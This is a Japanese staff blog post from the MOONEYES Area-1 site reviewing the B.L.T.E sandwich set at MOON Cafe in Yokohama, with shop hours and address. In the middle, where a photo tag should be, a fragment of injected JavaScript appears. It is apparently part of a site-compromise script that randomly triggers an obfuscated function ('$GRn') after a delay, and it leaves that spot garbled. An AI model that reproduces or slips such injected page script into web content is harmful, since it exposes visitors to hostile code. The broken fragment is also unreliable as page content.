MOONEYES Area-1 Official Website

Monthly Eater TAISEI Vol.4

約4分

こんにちは。

MOONEYES Area-1 Staff の TAISEI です。

ようやく寒さが落ち着いたかと思えば、日によって寒暖差が激しかったりでなんだか安定しない日々が続いてますね~。半袖・長袖 T シャツの入れ替わりだけならまだしも、厚手のジャケットが必要な寒い日には「この前しまったばかりなのに、また出すの!?」と思いながら渋々引っ張り出してます(笑)。コロナ第4波のこともあって体調管理にはまだまだ気が抜けない日々が続いていますが、皆さんも体調を崩さない様に気を付けましょう。

さあ、お待たせしました。4月の Monthly Menu 第2弾はこちらです!andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andwich-362×463.jpg” alt=”” width=”320″ height=”409″ />

B.L.T ならコンビニでも見かけますから皆さんもご存じでしょうが、B.L.T.E はそうそう無いでしょう。ベーコン・レタス・トマトに目玉焼きが加わったことで “E” がついていますが、もう既に食べる前から美味いと確信できます(笑)。さっそく実食といきましょう!

今回は夜の MOON CAFE からお届けします。夜の本牧通りを颯爽と駆け抜ける車や店内外のライトが昼とは違った世界を演出してくれて、とても良い雰囲気です。 MOONEYES 入社前の話ですが、アメリカ旅行に行った時の夜のハンバーガーショップを思い出します。落ち着きを感じたい方は夜がオススメですね~。そして B.L.T.E サンドウィッチを待つ間、いつも頼むコークばっかりではつまらないので、今回はメロンソーダを注文。何年振りに飲んだか忘れましたけど、久しぶりに飲んでみるとこんなに美味いのかとちょっと感動しました(笑)。さあ待つこと数分、メインの B.L.T.E サンドウィッチが到着しました。実物がこちらです!

今回は実食に備えて空腹にし過ぎてしまった結果、いち早くメインが食べたいという欲求が凄まじかったので、 普段のルーティンに逆らってメインの B.L.T.E サンドウィッチからガブッといきましょう!

一口食べただけですが、美味しさとようやく食にありつけた安心感から思わず笑ってしまいました(笑)。トーストは程良く焦げ目がついて香ばしさを出し、外がサクッとしながらも内側にパン本来のやわらかさもしっかり残っています。そしてトーストと同じくこれまた香ばしさを放ちまくるベーコンは肉の食感を感じる厚みとジューシーさが抜群です!サンドウィッチ用のベーコンは分厚すぎると食べづらくなるし、逆に薄すぎるとまったく存在感がありませんが、この厚みは老若男女問わず食べやすく旨味もしっかりと感じます。そしてそのベーコンを引き立てるようにフレッシュなレタスとトマトの酸味、黄身のまろやかさにフレンチドレッシングのコクでまとめ上げています。各食材の良さが伝わるようシンプルな味付けですので、互いに主張するのではなく、挟まれたもの同士でまとまる事で美味さをもう一段階上げて完成するサンドウィッチならではの良さを引き出した逸品ですね~。そりゃあ一口目で笑ってしまいます(笑)。

B.L.T.E サンドウィッチは2個あるので、1個目を食べ終えたら普段先んじて食べているフレンチフライとコールスローへ移行し、フレンチフライは最初はシンプルに何もつけずに数本食べて、その後再び B.L.T.E サンドウィッチへ戻りました。2個あるとこんな楽しみ方も出来るからいいですよね~。そして前回投稿時にお伝えしていなかったのですが、フレンチフライにはケチャップ・マヨネーズ・マスタードの3種類が用意されるのですが、僕は毎回マヨネーズをかけます(笑)。シンプルにフレンチフライだけで楽しむ他にも、どれが一番自分の口に合うか知ることが出来るかもしれませんよ?僕も機会を見つけてマヨネーズ以外も挑戦してみようと思います(笑)。そして B.L.T.E サンドウィッチとフレンチフライの面積に負けてしまっていてパッと見では存在感の薄いコールスローですが、味の存在感は負けておらず、ちょっと酸味の効いたソースとシャキシャキ食感はボリューミーな両者とは異なってマイルドな味付けなので、お口の中を一度さっぱりしたいなんて時に良いですよ~。隠れた名脇役です(笑)。

今回も美味しくいただきました。さて、サンドウィッチというとランチのイメージが先行しがちですが、MOON CAFE の B.L.T.E サンドウィッチは昼夜問わずどのタイミングにもマッチします!「夜に撮影したから」は関係なく、個人的には夜がオススメですね(笑)。お仕事終わりや学校終わりに時間を見つけて是非 MOON CAFE にご来店ください!

次回は5月の Monthly Menu です、お楽しみに!

Area-1 TAISEI

MOONEYES Area-1, MQQN Cafe Location
〒231-0804 神奈川県横浜市中区本牧宮原2-10

無料の Parking (駐車場) がございますので、
お気軽に Car & Motorcycle でお越しください。

MOONEYES Area-1
TEL 045-623-5959
●OPEN 10:00 ~ CLOSE 19:00 (月~日、祝日)
年中無休

MOON Cafe
TEL 045-623-3960

●OPEN 11:00 ~ CLOSE 20:30 (月~金 ※木除く)
ラストオーダー 20:00
●OPEN 10:30 ~ CLOSE 20:30 (土、日、祝日)

ラストオーダー 20:00
木曜 定休
(※木曜が祝日の場合は営業致します。)

Access Info